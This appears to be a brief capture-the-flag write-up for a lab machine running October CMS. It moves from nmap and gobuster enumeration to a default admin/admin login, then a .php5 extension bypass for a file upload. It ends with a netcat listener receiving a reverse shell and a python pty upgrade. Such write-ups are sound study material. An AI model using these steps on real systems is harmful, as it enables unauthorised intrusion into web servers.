October - FH: File Upload # ENUMERATION NMAP: - 22: OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 - 80: Apache httpd 2.4.7 ========================================================= # ENUMBERATION # WEBSITE October is a free, open-source, self-hosted CMS platform based on the Laravel PHP Framework. Welcome to the vanilla theme for OctoberCMS! - is running October CMS, with the Vanilla theme # ENUMERATION # GOBUSTER /Blog (Status: 200) [Size: 4255] /account (Status: 200) [Size: 5089] /backend (Status: 302) [Size: 400] /blog (Status: 200) [Size: 4255] /config (Status: 301) [Size: 310] /error (Status: 200) [Size: 3342] /forgot-password (Status: 200) [Size: 3837] /forum (Status: 200) [Size: 9590] ========================================================= # ENUMERATION # ENTRY INTO WEBSITE GUESSED: admin / admin - was able to enter the website with the guessed credentials. - must not be true admin... the users tab is forbidden. - FAIL: uploading a php reverse shell failed (no explanation) - PASS: a .php5 file uploaded ========================================================= # REVERSE SHELL # CLICK ON UPLOADED PHP5 FILE kali@kali:~$ nc -nvlp 1337 listening on [any] 1337 ... connect to [10.10.14.30] from (UNKNOWN) [10.10.10.16] 33990 Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux 05:51:22 up 37 min, 0 users, load average: 8.70, 9.07, 8.85 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ uname -a Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux ========================================================= # CONTROL ENVIRONMENT - i converted the shell to a bash shell with tty $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@october:/home/harry$ ls ls october-1.0.412.tar.gz user.txt ========================================================= # FOOTHOLD - UPLOAD FILE The foothold is complete, so I will save the privilege escalation for another time. =========================================================